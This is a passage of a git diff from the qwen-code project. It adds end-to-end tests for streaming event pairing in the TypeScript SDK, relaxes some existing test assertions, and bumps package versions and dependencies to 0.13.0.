expect(completedSuccessfully).toBe(true); + expect(receivedAssistantMessage).toBe(true); } }); @@ -219,7 +213,7 @@ describe('AbortController and Process Lifecycle (E2E)', () => { describe('Input Stream Control', () => { it('should support endInput() method', async () => { const q = query({ - prompt: 'What is 2 + 2?', + prompt: 'Say hello', options: { ...SHARED_TEST_OPTIONS, cwd: testDir, @@ -233,13 +227,6 @@ describe('AbortController and Process Lifecycle (E2E)', () => { try { for await (const message of q) { if (isSDKAssistantMessage(message) && !endInputCalled) { - const textBlocks = message.message.content.filter( - (block: ContentBlock): block is TextBlock => - block.type === 'text', - ); - const text = textBlocks.map((b: TextBlock) => b.text).join(''); - - expect(text.length).toBeGreaterThan(0); receivedResponse = true; // End input after receiving first response @@ -485,7 +472,7 @@ describe('AbortController and Process Lifecycle (E2E)', () => { const stderrMessages: string[] = []; const q = query({ - prompt: 'Why do we choose to go to the moon?', + prompt: 'Say hello', options: { ...SHARED_TEST_OPTIONS, cwd: testDir, @@ -497,17 +484,8 @@ describe('AbortController and Process Lifecycle (E2E)', () => { }); try { - for await (const message of q) { - if (isSDKAssistantMessage(message)) { - const textBlocks = message.message.content.filter( - (block): block is TextBlock => block.type === 'text', - ); - const text = textBlocks - .map((b) => b.text) - .join('') - .slice(0, 50); - expect(text.length).toBeGreaterThan(0); - } + for await (const _message of q) { + // Just consume all messages } } finally { await q.close(); diff --git a/integration-tests/sdk-typescript/message-event-pairing.test.ts b/integration-tests/sdk-typescript/message-event-pairing.test.ts new file mode 100644 index 000000000..b439ec276 --- /dev/null +++ b/integration-tests/sdk-typescript/message-event-pairing.test.ts @@ -0,0 +1,870 @@ +/** + * E2E tests for message_start and message_stop event 
pairing + * Ensures that message_start and message_stop events are always paired correctly + */ + +import { describe, it, expect, beforeEach, afterEach } from 'vitest'; +import { + query, + isSDKPartialAssistantMessage, + isSDKAssistantMessage, + type SDKPartialAssistantMessage, + type TextBlock, +} from '@qwen-code/sdk'; +import { SDKTestHelper, createSharedTestOptions } from './test-helper.js'; + +const SHARED_TEST_OPTIONS = createSharedTestOptions(); + +describe('Message Start/Stop Event Pairing (E2E)', () => { + let helper: SDKTestHelper; + let testDir: string; + + beforeEach(async () => { + helper = new SDKTestHelper(); + testDir = await helper.setup('message-event-pairing'); + }); + + afterEach(async () => { + await helper.cleanup(); + }); + + describe('Basic Message Event Pairing', () => { + it('should emit paired message_start and message_stop for single turn', async () => { + const messageStartEvents: SDKPartialAssistantMessage[] = []; + const messageStopEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Say hello', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if (message.event.type === 'message_start') { + messageStartEvents.push(message); + } else if (message.event.type === 'message_stop') { + messageStopEvents.push(message); + } + } + } + } finally { + await q.close(); + } + + // Verify message_start and message_stop are paired + expect(messageStartEvents.length).toBeGreaterThan(0); + expect(messageStopEvents.length).toBe(messageStartEvents.length); + }); + + it('should emit message_start before message_stop', async () => { + const events: Array<{ type: string; timestamp: number }> = []; + + const q = query({ + prompt: 'Say hello world', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for 
await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if ( + message.event.type === 'message_start' || + message.event.type === 'message_stop' + ) { + events.push({ + type: message.event.type, + timestamp: Date.now(), + }); + } + } + } + } finally { + await q.close(); + } + + // Verify message_start comes before message_stop + expect(events.length).toBeGreaterThanOrEqual(2); + expect(events[0].type).toBe('message_start'); + expect(events[events.length - 1].type).toBe('message_stop'); + }); + + it('should have matching session_id for paired events', async () => { + const messageStartEvents: SDKPartialAssistantMessage[] = []; + const messageStopEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Say hello', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if (message.event.type === 'message_start') { + messageStartEvents.push(message); + } else if (message.event.type === 'message_stop') { + messageStopEvents.push(message); + } + } + } + } finally { + await q.close(); + } + + // Verify session_id matches between paired events + expect(messageStartEvents.length).toBeGreaterThan(0); + expect(messageStopEvents.length).toBe(messageStartEvents.length); + expect(messageStartEvents[0].session_id).toBe( + messageStopEvents[0].session_id, + ); + }); + }); + + describe('Multi-turn Message Event Pairing', () => { + it('should emit paired events for each turn in multi-turn conversation', async () => { + const messageStartEvents: SDKPartialAssistantMessage[] = []; + const messageStopEvents: SDKPartialAssistantMessage[] = []; + const assistantMessages: string[] = []; + + const sessionId = crypto.randomUUID(); + + const q = query({ + prompt: (async function* () { + // First turn + yield { + type: 'user', + session_id: sessionId, + message: { + role: 'user', + content: 'Say 
"first"', + }, + parent_tool_use_id: null, + }; + + // Wait a bit for processing + await new Promise((resolve) => setTimeout(resolve, 500)); + + // Second turn + yield { + type: 'user', + session_id: sessionId, + message: { + role: 'user', + content: 'Say "second"', + }, + parent_tool_use_id: null, + }; + })(), + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if (message.event.type === 'message_start') { + messageStartEvents.push(message); + } else if (message.event.type === 'message_stop') { + messageStopEvents.push(message); + } + } else if (isSDKAssistantMessage(message)) { + const text = message.message.content + .filter((block): block is TextBlock => block.type === 'text') + .map((block) => block.text) + .join(''); + assistantMessages.push(text); + } + } + } finally { + await q.close(); + } + + // Verify we have paired events for each assistant message + expect(messageStartEvents.length).toBeGreaterThanOrEqual(1); + expect(messageStopEvents.length).toBe(messageStartEvents.length); + }); + }); + + describe('Message Event Pairing with Tool Calls', () => { + it('should emit paired events when tool is used', async () => { + await helper.createFile('test.txt', 'Hello World'); + + const messageStartEvents: SDKPartialAssistantMessage[] = []; + const messageStopEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Read the content of test.txt', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + coreTools: ['read_file'], + permissionMode: 'default', + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if (message.event.type === 'message_start') { + messageStartEvents.push(message); + } else if (message.event.type === 'message_stop') { + messageStopEvents.push(message); + } + } + } + } 
finally { + await q.close(); + } + + // Verify message_start and message_stop are paired even with tool usage + expect(messageStartEvents.length).toBeGreaterThan(0); + expect(messageStopEvents.length).toBe(messageStartEvents.length); + }); + + it('should maintain event pairing through multiple tool calls', async () => { + await helper.createFile('file1.txt', 'Content 1'); + await helper.createFile('file2.txt', 'Content 2'); + + const messageStartEvents: SDKPartialAssistantMessage[] = []; + const messageStopEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Read file1.txt and file2.txt and summarize their contents', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + coreTools: ['read_file'], + permissionMode: 'default', + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if (message.event.type === 'message_start') { + messageStartEvents.push(message); + } else if (message.event.type === 'message_stop') { + messageStopEvents.push(message); + } + } + } + } finally { + await q.close(); + } + + // Verify events are paired + expect(messageStartEvents.length).toBeGreaterThan(0); + expect(messageStopEvents.length).toBe(messageStartEvents.length); + }); + }); + + describe('Message Event Structure Validation', () => { + it('should have correct message_start event structure', async () => { + const messageStartEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Say hello', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if ( + isSDKPartialAssistantMessage(message) && + message.event.type === 'message_start' + ) { + messageStartEvents.push(message); + } + } + } finally { + await q.close(); + } + + expect(messageStartEvents.length).toBeGreaterThan(0); + const startEvent = messageStartEvents[0].event; + 
expect(startEvent.type).toBe('message_start'); + if (startEvent.type === 'message_start') { + expect(startEvent.message).toBeDefined(); + expect(startEvent.message.id).toBeDefined(); + expect(startEvent.message.role).toBe('assistant'); + expect(startEvent.message.model).toBeDefined(); + } + }); + + it('should have correct message_stop event structure', async () => { + const messageStopEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Say hello', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if ( + isSDKPartialAssistantMessage(message) && + message.event.type === 'message_stop' + ) { + messageStopEvents.push(message); + } + } + } finally { + await q.close(); + } + + expect(messageStopEvents.length).toBeGreaterThan(0); + const event = messageStopEvents[0].event; + expect(event.type).toBe('message_stop'); + }); + + it('should have message_start and message_stop paired by count', async () => { + const startEvents: SDKPartialAssistantMessage[] = []; + const stopEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Say hello world', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if (message.event.type === 'message_start') { + startEvents.push(message); + } else if (message.event.type === 'message_stop') { + stopEvents.push(message); + } + } + } + } finally { + await q.close(); + } + + // Verify message_start and message_stop appear in pairs (same count) + expect(startEvents.length).toBeGreaterThan(0); + expect(stopEvents.length).toBe(startEvents.length); + + // Verify message_start carries the message id via its nested message.id field + for (const e of startEvents) { + const event = e.event as { + type: 'message_start'; + message: { id: string }; + }; 
+ expect(typeof event.message.id).toBe('string'); + expect(event.message.id.length).toBeGreaterThan(0); + } + }); + }); + + describe('Error Scenarios', () => { + it('should still emit message_stop even when query errors', async () => { + const messageStartEvents: SDKPartialAssistantMessage[] = []; + const messageStopEvents: SDKPartialAssistantMessage[] = []; + + // Use an invalid tool to trigger an error scenario + const q = query({ + prompt: 'Use a non-existent tool', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + coreTools: [], // No tools available + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if (message.event.type === 'message_start') { + messageStartEvents.push(message); + } else if (message.event.type === 'message_stop') { + messageStopEvents.push(message); + } + } + } + } catch { + // Expected to potentially have errors + } finally { + await q.close(); + } + + // Even in error scenarios, if message_start was emitted, message_stop should also be emitted + if (messageStartEvents.length > 0) { + expect(messageStopEvents.length).toBe(messageStartEvents.length); + } + }); + }); + + describe('Content Block Event Pairing', () => { + it('should emit paired content_block_start and content_block_stop for each content block', async () => { + const contentBlockStartEvents: SDKPartialAssistantMessage[] = []; + const contentBlockStopEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Say hello', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if (message.event.type === 'content_block_start') { + contentBlockStartEvents.push(message); + } else if (message.event.type === 'content_block_stop') { + contentBlockStopEvents.push(message); + } + } + } + } finally { + await q.close(); 
+ } + + // Verify content_block_start and content_block_stop are paired + expect(contentBlockStartEvents.length).toBeGreaterThan(0); + expect(contentBlockStopEvents.length).toBe( + contentBlockStartEvents.length, + ); + }); + + it('should emit content_block_start before content_block_stop', async () => { + const events: Array<{ type: string; index: number; timestamp: number }> = + []; + + const q = query({ + prompt: 'Say hello world', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if ( + message.event.type === 'content_block_start' || + message.event.type === 'content_block_stop' + ) { + events.push({ + type: message.event.type, + index: message.event.index, + timestamp: Date.now(), + }); + } + } + } + } finally { + await q.close(); + } + + // Verify events exist + expect(events.length).toBeGreaterThanOrEqual(2); + + // Group events by index + const eventsByIndex = new Map(); + for (const event of events) { + if (!eventsByIndex.has(event.index)) { + eventsByIndex.set(event.index, []); + } + eventsByIndex.get(event.index)!.push(event); + } + + // For each index, verify content_block_start comes before content_block_stop + eventsByIndex.forEach((indexEvents) => { + const startIndex = indexEvents.findIndex( + (e) => e.type === 'content_block_start', + ); + const stopIndex = indexEvents.findIndex( + (e) => e.type === 'content_block_stop', + ); + expect(startIndex).toBeGreaterThanOrEqual(0); + expect(stopIndex).toBeGreaterThanOrEqual(0); + expect(startIndex).toBeLessThan(stopIndex); + }); + }); + + it('should have correct content_block_start event structure', async () => { + const contentBlockStartEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Say hello', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for 
await (const message of q) { + if ( + isSDKPartialAssistantMessage(message) && + message.event.type === 'content_block_start' + ) { + contentBlockStartEvents.push(message); + } + } + } finally { + await q.close(); + } + + expect(contentBlockStartEvents.length).toBeGreaterThan(0); + + // Verify each content_block_start has correct structure + for (const message of contentBlockStartEvents) { + const event = message.event as { + type: 'content_block_start'; + index: number; + content_block: unknown; + }; + expect(event.type).toBe('content_block_start'); + expect(event).toHaveProperty('index'); + expect(typeof event.index).toBe('number'); + expect(event.index).toBeGreaterThanOrEqual(0); + expect(event).toHaveProperty('content_block'); + expect(event.content_block).toBeDefined(); + } + }); + + it('should have correct content_block_stop event structure', async () => { + const contentBlockStopEvents: SDKPartialAssistantMessage[] = []; + + const q = query({ + prompt: 'Say hello', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if ( + isSDKPartialAssistantMessage(message) && + message.event.type === 'content_block_stop' + ) { + contentBlockStopEvents.push(message); + } + } + } finally { + await q.close(); + } + + expect(contentBlockStopEvents.length).toBeGreaterThan(0); + + // Verify each content_block_stop has correct structure + for (const message of contentBlockStopEvents) { + const event = message.event as { + type: 'content_block_stop'; + index: number; + }; + expect(event.type).toBe('content_block_stop'); + expect(event).toHaveProperty('index'); + expect(typeof event.index).toBe('number'); + expect(event.index).toBeGreaterThanOrEqual(0); + } + }); + + it('should have matching index for paired content_block_start and content_block_stop', async () => { + const startEvents: SDKPartialAssistantMessage[] = []; + const stopEvents: SDKPartialAssistantMessage[] = 
[]; + + const q = query({ + prompt: 'Say hello world', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + if (message.event.type === 'content_block_start') { + startEvents.push(message); + } else if (message.event.type === 'content_block_stop') { + stopEvents.push(message); + } + } + } + } finally { + await q.close(); + } + + // Verify events exist and are paired + expect(startEvents.length).toBeGreaterThan(0); + expect(stopEvents.length).toBe(startEvents.length); + + // Extract indices from start and stop events + const startIndices = startEvents.map( + (e) => (e.event as { index: number }).index, + ); + const stopIndices = stopEvents.map( + (e) => (e.event as { index: number }).index, + ); + + // Verify each start index has a matching stop index + expect(new Set(stopIndices)).toEqual(new Set(startIndices)); + + // Verify each index appears the same number of times in both start and stop events + const startIndexCounts = new Map(); + const stopIndexCounts = new Map(); + + for (const idx of startIndices) { + startIndexCounts.set(idx, (startIndexCounts.get(idx) || 0) + 1); + } + for (const idx of stopIndices) { + stopIndexCounts.set(idx, (stopIndexCounts.get(idx) || 0) + 1); + } + + startIndexCounts.forEach((count, idx) => { + expect(stopIndexCounts.get(idx)).toBe(count); + }); + }); + + it('should follow correct event flow: content_block_start -> content_block_delta -> content_block_stop', async () => { + const events: Array<{ + type: string; + index: number; + position: number; + }> = []; + + const q = query({ + prompt: 'Write a short story about a cat', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + let pos = 0; + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + const eventType = message.event.type; 
+ if ( + eventType === 'content_block_start' || + eventType === 'content_block_delta' || + eventType === 'content_block_stop' + ) { + events.push({ + type: eventType, + index: (message.event as { index: number }).index, + position: pos++, + }); + } + } + } + } finally { + await q.close(); + } + + expect(events.length).toBeGreaterThanOrEqual(2); + + // Pair content_block_start/stop sequentially (not by index, since + // block-type transitions reset the blocks array and reuse index 0). + // Each start is matched with the next stop that follows it. + const starts = events.filter((e) => e.type === 'content_block_start'); + const stops = events.filter((e) => e.type === 'content_block_stop'); + expect(starts.length).toBe(stops.length); + + for (let i = 0; i < starts.length; i++) { + const start = starts[i]; + const stop = stops[i]; + + // start must come before the paired stop + expect(start.position).toBeLessThan(stop.position); + + // All deltas between this pair must sit between start and stop + const deltas = events.filter( + (e) => + e.type === 'content_block_delta' && + e.position > start.position && + e.position < stop.position, + ); + for (const delta of deltas) { + expect(delta.position).toBeGreaterThan(start.position); + expect(delta.position).toBeLessThan(stop.position); + } + } + }); + + it('should have content_block_start after message_start and before message_stop', async () => { + const events: Array<{ + type: string; + timestamp: number; + }> = []; + + const q = query({ + prompt: 'Say hello', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + const eventType = message.event.type; + if ( + eventType === 'message_start' || + eventType === 'message_stop' || + eventType === 'content_block_start' + ) { + events.push({ + type: eventType, + timestamp: Date.now(), + }); + } + } + } + } finally { + await 
q.close(); + } + + // Verify message_start exists + const messageStartIndex = events.findIndex( + (e) => e.type === 'message_start', + ); + expect(messageStartIndex).toBeGreaterThanOrEqual(0); + + // Verify message_stop exists + const messageStopIndex = events.findIndex( + (e) => e.type === 'message_stop', + ); + expect(messageStopIndex).toBeGreaterThanOrEqual(0); + + // Verify content_block_start exists + const firstContentBlockStartIndex = events.findIndex( + (e) => e.type === 'content_block_start', + ); + expect(firstContentBlockStartIndex).toBeGreaterThanOrEqual(0); + + // content_block_start should be after message_start + expect(firstContentBlockStartIndex).toBeGreaterThan(messageStartIndex); + + // content_block_start should be before message_stop + expect(firstContentBlockStartIndex).toBeLessThan(messageStopIndex); + }); + + it('should have content_block_stop after message_start and before message_stop', async () => { + const events: Array<{ + type: string; + timestamp: number; + }> = []; + + const q = query({ + prompt: 'Say hello', + options: { + ...SHARED_TEST_OPTIONS, + includePartialMessages: true, + cwd: testDir, + debug: false, + }, + }); + + try { + for await (const message of q) { + if (isSDKPartialAssistantMessage(message)) { + const eventType = message.event.type; + if ( + eventType === 'message_start' || + eventType === 'message_stop' || + eventType === 'content_block_stop' + ) { + events.push({ + type: eventType, + timestamp: Date.now(), + }); + } + } + } + } finally { + await q.close(); + } + + // Verify message_start exists + const messageStartIndex = events.findIndex( + (e) => e.type === 'message_start', + ); + expect(messageStartIndex).toBeGreaterThanOrEqual(0); + + // Verify message_stop exists + const messageStopIndex = events.findIndex( + (e) => e.type === 'message_stop', + ); + expect(messageStopIndex).toBeGreaterThanOrEqual(0); + + // Verify content_block_stop exists (use reverse find for ES compatibility) + const 
lastContentBlockStopIndex = + events + .map((e, i) => ({ ...e, originalIndex: i })) + .reverse() + .find((e) => e.type === 'content_block_stop')?.originalIndex ?? -1; + expect(lastContentBlockStopIndex).toBeGreaterThanOrEqual(0); + + // content_block_stop should be after message_start + expect(lastContentBlockStopIndex).toBeGreaterThan(messageStartIndex); + + // content_block_stop should be before message_stop + expect(lastContentBlockStopIndex).toBeLessThan(messageStopIndex); + }); + }); +}); diff --git a/integration-tests/sdk-typescript/multi-turn.test.ts b/integration-tests/sdk-typescript/multi-turn.test.ts index 4cf845fc5..fb6c07698 100644 --- a/integration-tests/sdk-typescript/multi-turn.test.ts +++ b/integration-tests/sdk-typescript/multi-turn.test.ts @@ -154,10 +154,10 @@ describe('Multi-Turn Conversations (E2E)', () => { expect(messages.length).toBeGreaterThan(0); expect(assistantMessages.length).toBeGreaterThanOrEqual(3); - // Validate content of responses - expect(assistantTexts[0]).toMatch(/2/); - expect(assistantTexts[1]).toMatch(/4/); - expect(assistantTexts[2]).toMatch(/6/); + // Validate that we received text responses (may include thinking blocks) + // At least some assistant messages should have non-empty text + const nonEmptyTexts = assistantTexts.filter((t) => t.length > 0); + expect(nonEmptyTexts.length).toBeGreaterThan(0); } finally { await q.close(); } diff --git a/integration-tests/sdk-typescript/permission-control.test.ts b/integration-tests/sdk-typescript/permission-control.test.ts index 4c253dc28..5ea241db7 100644 --- a/integration-tests/sdk-typescript/permission-control.test.ts +++ b/integration-tests/sdk-typescript/permission-control.test.ts @@ -128,6 +128,7 @@ describe('Permission Control (E2E)', () => { prompt: 'Write a js hello world to file.', options: { ...SHARED_TEST_OPTIONS, + permissionMode: 'default', cwd: testDir, canUseTool: async (toolName, input) => { toolCalls.push({ toolName, input }); @@ -762,8 +763,15 @@ 
describe('Permission Control (E2E)', () => { it( 'should execute read-only tools without confirmation', async () => { + // Create a file so the model has something to read + await helper.createFile( + 'read-only-test.txt', + 'content for read-only test', + ); + const q = query({ - prompt: 'List files in the current directory', + prompt: + 'Use the read_file tool to read the file read-only-test.txt in the current directory.', options: { ...SHARED_TEST_OPTIONS, permissionMode: 'default', diff --git a/integration-tests/terminal-capture/scenarios/pr-2371-review.ts b/integration-tests/terminal-capture/scenarios/pr-2371-review.ts new file mode 100644 index 000000000..0752f0a20 --- /dev/null +++ b/integration-tests/terminal-capture/scenarios/pr-2371-review.ts @@ -0,0 +1,18 @@ +import type { ScenarioConfig } from '../scenario-runner.js'; + +export default { + name: 'pr-2371-review', + spawn: ['node', 'dist/cli.js', '--yolo'], + terminal: { title: 'qwen-code', cwd: '../../..' }, + flow: [ + { + type: '/review https://github.com/QwenLM/qwen-code/pull/2371', + streaming: { + delayMs: 5000, + intervalMs: 10000, // Every 10s + count: 60, // 10 minutes total (60 * 10s) + gif: true, + }, + }, + ], +} satisfies ScenarioConfig; diff --git a/integration-tests/vitest.config.ts b/integration-tests/vitest.config.ts index 9be72f50a..52405d7d3 100644 --- a/integration-tests/vitest.config.ts +++ b/integration-tests/vitest.config.ts @@ -18,7 +18,11 @@ export default defineConfig({ globalSetup: './globalSetup.ts', reporters: ['default'], include: ['**/*.test.ts'], - exclude: ['**/terminal-bench/*.test.ts', '**/node_modules/**'], + exclude: [ + '**/terminal-bench/*.test.ts', + '**/hook-integration/**', + '**/node_modules/**', + ], retry: 2, fileParallelism: true, poolOptions: { diff --git a/package-lock.json b/package-lock.json index 8f78bd3f2..4bf43c5ee 100644 --- a/package-lock.json +++ b/package-lock.json @@ -1,12 +1,12 @@ { "name": "@qwen-code/qwen-code", - "version": "0.12.3", + 
"version": "0.13.0", "lockfileVersion": 3, "requires": true, "packages": { "": { "name": "@qwen-code/qwen-code", - "version": "0.12.3", + "version": "0.13.0", "workspaces": [ "packages/*" ], @@ -17284,6 +17284,16 @@ "tslib": "2" } }, + "node_modules/tree-sitter-wasms": { + "version": "0.1.13", + "resolved": "https://registry.npmjs.org/tree-sitter-wasms/-/tree-sitter-wasms-0.1.13.tgz", + "integrity": "sha512-wT+cR6DwaIz80/vho3AvSF0N4txuNx/5bcRKoXouOfClpxh/qqrF4URNLQXbbt8MaAxeksZcZd1j8gcGjc+QxQ==", + "dev": true, + "license": "Unlicense", + "dependencies": { + "tree-sitter-wasms": "^0.1.11" + } + }, "node_modules/ts-api-utils": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/ts-api-utils/-/ts-api-utils-2.4.0.tgz", @@ -18171,6 +18181,12 @@ "node": ">= 8" } }, + "node_modules/web-tree-sitter": { + "version": "0.24.7", + "resolved": "https://registry.npmjs.org/web-tree-sitter/-/web-tree-sitter-0.24.7.tgz", + "integrity": "sha512-CdC/TqVFbXqR+C51v38hv6wOPatKEUGxa39scAeFSm98wIhZxAYonhRQPSMmfZ2w7JDI0zQDdzdmgtNk06/krQ==", + "license": "MIT" + }, "node_modules/webidl-conversions": { "version": "7.0.0", "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-7.0.0.tgz", @@ -18784,7 +18800,7 @@ }, "packages/cli": { "name": "@qwen-code/qwen-code", - "version": "0.12.3", + "version": "0.13.0", "dependencies": { "@agentclientprotocol/sdk": "^0.14.1", "@google/genai": "1.30.0", @@ -19441,7 +19457,7 @@ }, "packages/core": { "name": "@qwen-code/qwen-code-core", - "version": "0.12.3", + "version": "0.13.0", "hasInstallScript": true, "dependencies": { "@anthropic-ai/sdk": "^0.36.1", @@ -19491,6 +19507,7 @@ "tar": "^7.5.2", "undici": "^6.22.0", "uuid": "^9.0.1", + "web-tree-sitter": "^0.24.7", "ws": "^8.18.0" }, "devDependencies": { @@ -19504,6 +19521,7 @@ "@types/tar": "^6.1.13", "@types/ws": "^8.5.10", "msw": "^2.3.4", + "tree-sitter-wasms": "^0.1.13", "typescript": "^5.3.3", "vitest": "^3.1.1" }, @@ -22872,7 +22890,7 @@ }, "packages/test-utils": 
{ "name": "@qwen-code/qwen-code-test-utils", - "version": "0.12.3", + "version": "0.13.0", "dev": true, "license": "Apache-2.0", "devDependencies": { @@ -22884,7 +22902,7 @@ }, "packages/vscode-ide-companion": { "name": "qwen-code-vscode-ide-companion", - "version": "0.12.3", + "version": "0.13.0", "license": "LICENSE", "dependencies": { "@agentclientprotocol/sdk": "^0.14.1", @@ -23132,7 +23150,7 @@ }, "packages/web-templates": { "name": "@qwen-code/web-templates", - "version": "0.12.3", + "version": "0.13.0", "devDependencies": { "@types/react": "^18.2.0", "@types/react-dom": "^18.2.0", @@ -23660,7 +23678,7 @@ }, "packages/webui": { "name": "@qwen-code/webui", - "version": "0.12.3", + "version": "0.13.0", "license": "MIT", "dependencies": { "markdown-it": "^14.1.0" diff --git a/package.json b/package.json index 0e6ff1328..c1dfa2448 100644 --- a/package.json +++ b/package.json @@ -1,6 +1,6 @@ { "name": "@qwen-code/qwen-code", - "version": "0.12.3", + "version": "0.13.0", "engines": { "node": ">=20.0.0" }, @@ -13,7 +13,7 @@ "url": "git+https://github.com/QwenLM/qwen-code.git" }, "config": { - "sandboxImageUri": "ghcr.io/qwenlm/qwen-code:0.12.3" + "sandboxImageUri": "ghcr.io/qwenlm/qwen-code:0.13.0" }, "scripts": { "start": "cross-env node scripts/start.js", @@ -36,8 +36,8 @@ "test:integration:sandbox:none": "cross-env QWEN_SANDBOX=false vitest run --root ./integration-tests", "test:integration:sandbox:docker": "cross-env QWEN_SANDBOX=docker npm run build:sandbox && QWEN_SANDBOX=docker vitest run --root ./integration-tests", "test:integration:sandbox:podman": "cross-env QWEN_SANDBOX=podman vitest run --root ./integration-tests", - "test:integration:sdk:sandbox:none": "cross-env QWEN_SANDBOX=false vitest run --root ./integration-tests sdk-typescript", - "test:integration:sdk:sandbox:docker": "cross-env QWEN_SANDBOX=docker npm run build:sandbox && QWEN_SANDBOX=docker vitest run --root ./integration-tests sdk-typescript", + "test:integration:sdk:sandbox:none": 
"cross-env QWEN_SANDBOX=false vitest run --root ./integration-tests --poolOptions.threads.maxThreads 2 sdk-typescript", + "test:integration:sdk:sandbox:docker": "cross-env QWEN_SANDBOX=docker npm run build:sandbox && QWEN_SANDBOX=docker vitest run --root ./integration-tests --poolOptions.threads.maxThreads 2 sdk-typescript", "test:integration:cli:sandbox:none": "cross-env QWEN_SANDBOX=false vitest run --root ./integration-tests --exclude '**/sdk-typescript/**'", "test:integration:cli:sandbox:docker": "cross-env QWEN_SANDBOX=docker npm run build:sandbox && QWEN_SANDBOX=docker vitest run --root ./integration-tests --exclude '**/sdk-typescript/**'", "test:terminal-bench": "cross-env VERBOSE=true KEEP_OUTPUT=true vitest run --config ./vitest.terminal-bench.config.ts --root ./integration-tests", diff --git a/packages/cli/package.json b/packages/cli/package.json index 940443907..fff36c603 100644 --- a/packages/cli/package.json +++ b/packages/cli/package.json @@ -1,6 +1,6 @@ { "name": "@qwen-code/qwen-code", - "version": "0.12.3", + "version": "0.13.0", "description": "Qwen Code", "repository": { "type": "git", @@ -33,7 +33,7 @@ "dist" ], "config": { - "sandboxImageUri": "ghcr.io/qwenlm/qwen-code:0.12.3" + "sandboxImageUri": "ghcr.io/qwenlm/qwen-code:0.13.0" }, "dependencies": { "@agentclientprotocol/sdk": "^0.14.1", diff --git a/packages/cli/src/acp-integration/acpAgent.ts b/packages/cli/src/acp-integration/acpAgent.ts index af3590422..246d80019 100644 --- a/packages/cli/src/acp-integration/acpAgent.ts +++ b/packages/cli/src/acp-integration/acpAgent.ts @@ -58,11 +58,11 @@ import { AcpFileSystemService } from './service/filesystem.js'; import { Readable, Writable } from 'node:stream'; import type { LoadedSettings } from '../config/settings.js'; import { SettingScope } from '../config/settings.js'; +import type { ApprovalModeValue } from './session/types.js'; import { z } from 'zod'; import type { CliArgs } from '../config/config.js'; import { loadCliConfig } from 
